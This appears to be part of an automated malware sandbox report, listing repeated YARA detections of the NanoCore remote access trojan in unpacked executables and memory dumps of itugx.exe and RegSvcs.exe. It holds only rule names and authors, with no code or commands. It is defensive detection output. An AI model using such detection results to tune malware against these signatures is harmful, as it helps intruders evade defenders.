      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
